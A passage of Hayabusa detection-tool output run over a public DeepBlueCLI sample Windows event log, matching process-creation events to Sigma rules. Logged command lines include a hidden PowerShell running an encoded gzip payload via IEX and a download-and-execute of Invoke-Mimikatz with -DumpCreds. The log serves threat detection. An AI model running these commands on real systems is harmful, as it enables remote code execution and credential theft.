fH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.135 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:23:37.348 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:11.794 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:11.932 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:12.031 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 21:32:15.491 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:02:47.665 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:03:41.021 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:04:04.853 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:05:07.184 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:05:22.839 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 22:38:23.648 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:11:13.677 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:13:17.369 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:28.626 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:32.207 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:32.340 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:38.772 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:41.273 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:41.456 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:41.478 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:52.074 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:21:52.074 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:34.138 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:34.389 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:34.400 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:35.564 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:29:35.564 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:49.583 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:49.699 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:49.715 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:50.791 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:36:50.791 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:00:02.041 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:03:44.685 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:22.985 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:45.826 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:45.870 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:11:52.496 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute 